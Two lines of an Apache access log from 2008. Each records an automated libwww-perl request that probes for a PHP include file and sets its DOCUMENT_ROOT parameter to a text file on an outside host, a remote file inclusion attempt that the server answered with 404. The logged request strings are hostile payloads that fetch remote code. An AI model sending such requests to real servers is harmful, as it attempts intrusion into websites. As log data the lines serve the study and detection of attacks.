66.40.52.28 - - [04/Nov/2008:10:40:50 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.40.52.28 - - [04/Nov/2008:10:40:50 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
